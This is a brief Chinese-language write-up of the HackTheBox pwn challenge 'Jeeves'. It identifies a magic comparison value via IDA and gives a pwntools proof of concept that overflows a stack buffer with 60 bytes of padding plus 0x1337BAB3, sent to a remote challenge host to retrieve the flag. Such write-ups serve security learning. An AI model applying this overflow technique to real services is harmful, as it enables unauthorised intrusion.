hackthebox Pwn Jeeves
今天两更 主要是因为这两个题都比较简单
直接解压
这次没有源文件了 IDA反编译看下
直接就看到条件了
十进制转换一下16进制 直接 执行就行
322419379 转换 16 进制 0x1337BAB3
poc:
from pwn import *
r=remote('83.136.255.150',47162)
payload =b"A"*60
payload += p64(0x1337bab3)
print(payload)
r.sendline(payload)
print(r.recvuntil('}'))
get flag